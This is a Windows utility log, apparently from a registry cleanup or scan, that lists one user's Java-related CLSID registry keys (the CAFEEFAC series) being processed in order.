[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0049-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0050-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0051-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0052-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0053-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0054-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0055-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0056-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0057-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0058-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0059-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0060-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0061-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0062-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0063-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0064-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0065-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0066-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0067-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0068-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0069-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0070-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0071-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0072-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0073-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0074-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-0075-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0015-0000-FFFF-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0000-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0001-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0002-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0003-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0004-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0005-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0006-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0007-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0008-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0009-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0010-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0011-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0012-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0013-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0014-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0015-ABCDEFFEDCBC}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBA}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBB}]
[2014.11.07 16:06:35.295] - INFO: Processing clsid [\Registry\User\S-1-5-21-1987813687-3303645166-2786259458-1001\SOFTWARE\Classes\CLSID\{CAFEEFAC-0016-0000-0016-ABCDEFFEDCBC}]
